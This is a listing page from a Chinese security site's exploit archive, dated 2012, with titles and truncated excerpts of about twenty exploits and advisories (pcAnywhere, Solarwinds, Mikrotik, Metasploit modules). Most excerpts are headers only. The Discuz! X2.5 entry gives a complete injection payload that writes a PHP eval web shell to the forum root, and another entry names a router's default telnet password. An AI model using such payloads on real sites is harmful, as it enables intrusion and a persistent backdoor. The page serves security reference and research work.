安全文章 / 文章资料 / Exploits

首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

热门关键字：　shell 　88888 　art 　vitter 　linux

		当前位置：主页>安全文章>文章资料>Exploits>列表


	Symantec pcAnywhere Insecure File Permissions Local Privilege Escalation
	日期：2012-05-03 09:37:53 点击：133 评论：0
======= Summary ======= Name: Symantec pcAnywhere insecure file permissions local privilege escalation Release Date: 30 April 2012 Reference: NGS00117 Discoverer: Edward Torkington edward.torkington@ngssecure.com Vendor: Symantec Vendor Reference: S


	OpenConf <= 4.11 (author/edit.php) Remote Blind SQL Injection Exploit
	日期：2012-05-03 09:37:02 点击：65 评论：0
?php /* --------------------------------------------------------------------- OpenConf = 4.11 (author/edit.php) Remote Blind SQL Injection Exploit --------------------------------------------------------------------- author...............: Egidio Ro


	Microsoft Windows xp Win32k.sys Local Kernel DoS Vulnerability
	日期：2012-05-03 09:33:53 点击：58 评论：0
//////////////////////////////////////////////////////////////////////////// // // Title: Microsoft Windows xp Win32k.sys Local Kernel DoS Vulnerability // Author: Lufeng Li of Neusoft Corporation // Vendor: www.microsoft.com // Vulnerable: Windows


	Format Factory v2.95 - Buffer Overflow Vulnerabilities
	日期：2012-05-03 09:31:47 点击：107 评论：0
Title: ====== Format Factory v2.95 - Buffer Overflow Vulnerabilities Introduction: ============= Format Factory is a multifunctional media converter. Provides functions below ... - All to MP4/3GP/MPG/AVI/WMV/FLV/SWF. - All to MP3/WMA/AMR/OGG/AAC/WAV.


	Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit
	日期：2012-05-02 10:31:22 点击：53 评论：0
#!/usr/bin/python ###################################################################################### # Exploit Title: Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit # Date: May 2nd 2012 # Author: muts # Version: SolarWinds


	Mikrotik Router Denial of Service
	日期：2012-05-02 10:29:30 点击：118 评论：0
#!/usr/bin/python # Exploit Title: Mikrotik Router Remote Denial Of Service attack # Date: 19/4/2012 # Author: PoURaN @ 133tsec.com # Software Link: http://www.mikrotik.com # Version: All mikrotik routers with winbox service enabled are affected (st


	LAN Messenger <= v1.2.28 Denial of Service Vulnerability
	日期：2012-05-02 10:28:32 点击：37 评论：0
#!/usr/bin/python # Exploit Title: LAN Messenger = v1.2.28 Remote Denial of Service Vulnerability # Version: = v1.2.28 # Date: 2012-04-28 # Author: Julien Ahrens # Homepage: www.inshell.net # Software Link: http://lanmsngr.sourceforge.net/ # Tested


	McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability
	日期：2012-05-02 10:27:47 点击：38 评论：0
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framewo


	SAMSUNG NET-i Viewer 1.37 SEH Overwrite
	日期：2012-05-02 10:24:06 点击：340 评论：0
html object classid='clsid:FA6E2EA9-D816-4F00-940B-609C9E8847A4' id='target' /object script language='vbscript' ' Exploit Title: SAMSUNG NET-i viewer ActiveX SEH Overwrite ' Date: April 30 2012 ' Author: Blake ' Software Link: http://www.samsungsecu


	McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 ActiveX GetObject() Exp
	日期：2012-05-02 10:17:13 点击：117 评论：0
McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 ActiveX Control GetObject() Security Bypass Remote Code Execution Vulnerability tested against: Microsoft Windows Vista sp2 Microsoft Windows 2003 r2 sp2 Internet Explorer 7/8/9 product homepa


	Remote-Anything Player 5.60.15 Denial of Service
	日期：2012-05-02 10:15:30 点击：313 评论：0
#!python # Title: Remote-Anything Player 5.60.15 PoC # Author: Saint Patrick saintpatrick@l1pht.com # Date: 4/25/2012 # Just a heads up, you can get full EIP by pushing on. # However, at crash time no registers point to buffer, so I chose # instead


	WebCalendar 1.2.4 Pre-Auth Remote Code Injection
	日期：2012-05-02 10:14:39 点击：36 评论：0
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framewo


	Mikrotik's Winbox Remote Code Execution
	日期：2012-05-02 10:12:37 点击：512 评论：0
#!/usr/bin/python# Exploit Title: Mikrotik's Winbox Remote Code Execution# Author: PoURaN# Software Link: http://www.mikrotik.com/download.html# Version: probably all winbox versions. Tried 2.2.7 - 2.2.18# Tested on: Windows XP SP2, SP3, Windows 7 S


	Nokia PC Suite Video Manager 7.1.180.64 (.mp4) Denial of Service
	日期：2012-04-28 09:55:13 点击：38 评论：0
########################################################################################################### Application : Nokia PC Suite Video Manager DoS Versions : = 7.1.180.64 Date : Friday, April 27,2012 Auther : Senator of Pirates E-Mail : Sena


	CPE17 Autorun Killer <= 1.7.1 Stack Buffer Overflow Exploit
	日期：2012-04-28 09:53:19 点击：24 评论：0
# # CPE17 Autorun Killer = 1.7.1 Stack Buffer Overflow exploit # by Xelenonz require 'msf/core' class Metasploit3 Msf::Exploit::Remote include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' = 'CPE17 Autorun Killer


	Discuz! X2.5 远程代码执行漏洞及EXP
	日期：2012-04-28 09:39:54 点击：318 评论：0
1.注册任意账户； 2.登陆用户，发表blog日志（注意是日志）； 3.添加图片，选择网络图片，地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} 4.访问日志，论坛根目录下生成demo.php，一句发密码c。


	Parallels PLESK 9.x Insecure Permissions
	日期：2012-04-27 09:51:28 点击：36 评论：0
# Exploit Title: PLESK 9.x insecure directory permission ( admin password revealed ) # Date: 25/04/2012 # Author: Nicolas Krassas , twitter.com/dinosn # Software Link: www.parallels.com/plesk/ # Version: 9.x # Tested on: ubuntu / centos During b


	MoroccoTel Box Default Open Telnet Password
	日期：2012-04-27 09:46:10 点击：81 评论：0
a vulnerability was identified on MoroccoTel Boxes: a telnet server is running, open to the web, with a default password of admin (or 123456) This critical vulnerability can affect the entire network of a Country. Solution: change the default passwor


	mount.cifs chdir() Arbitrary root File Identification
	日期：2012-04-26 14:39:47 点击：83 评论：0
########## Blueliv Advisory 2012-004 ########## - Discovered by: Jesus Olmos Gonzalez at Blueliv - Risk: 5/5 - Impact: 1/5 ############################################### 1. VULNERABILITY ------------------------- linux privileged and arbitrary chdi


	Shadow Stream Recorder 3.0.1.7 Buffer Overflow
	日期：2012-04-26 09:48:42 点击：34 评论：0
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framewo

共637页/12733条记录首页上一页 [248] [249] [250] 251 [252] [253] [254] 下一页末页

本月热点文章

本月推荐文章

相关分类

Exploits

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved